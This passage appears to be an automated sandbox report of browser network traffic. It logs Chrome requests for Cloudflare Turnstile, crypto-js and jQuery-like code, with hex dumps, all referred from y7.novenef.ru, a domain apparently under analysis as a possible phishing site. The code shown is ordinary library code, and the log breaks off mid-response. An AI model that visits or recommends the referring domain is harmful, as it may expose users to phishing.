                                                                      2025-01-07 08:27:09 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                      2025-01-07 08:27:09 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                      2025-01-07 08:27:09 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                      2025-01-07 08:27:09 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                      2025-01-07 08:27:09 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.1649719104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:09 UTC645OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:09 UTC386INHTTP/1.1 302 Found
                                                                      Date: Tue, 07 Jan 2025 08:27:09 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                      cross-origin-resource-policy: cross-origin
                                                                      location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29126484c424f-EWR
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.1649718104.17.24.144436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:09 UTC647OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                      Host: cdnjs.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:09 UTC963INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:09 GMT
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=30672000
                                                                      ETag: W/"61182885-40eb"
                                                                      Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                      cf-cdnjs-via: cfworker/kv
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Timing-Allow-Origin: *
                                                                      X-Content-Type-Options: nosniff
                                                                      CF-Cache-Status: HIT
                                                                      Age: 1104177
                                                                      Expires: Sun, 28 Dec 2025 08:27:09 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYZsMmf97u%2BjS%2FqD1cpRs3XfrpzTJTlpMfdFudcT8Uy7MJatnisHdaPo4EYeOe0L1ypATpkTNWKn88uNY9S5E2GiA89Nc9QZrX%2BXCEde%2Bu0vfE2fcrKUVbAaRHq%2FWyrohAVEv5cC"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=15780000
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe291264e440f60-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:09 UTC406INData Raw: 33 39 37 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                      Data Ascii: 3976!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                      Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                      Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                      Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                                      Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                                      Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                      Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                      Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                      Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                      2025-01-07 08:27:09 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                      Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.1649722104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:09 UTC644OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:09 UTC471INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:09 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
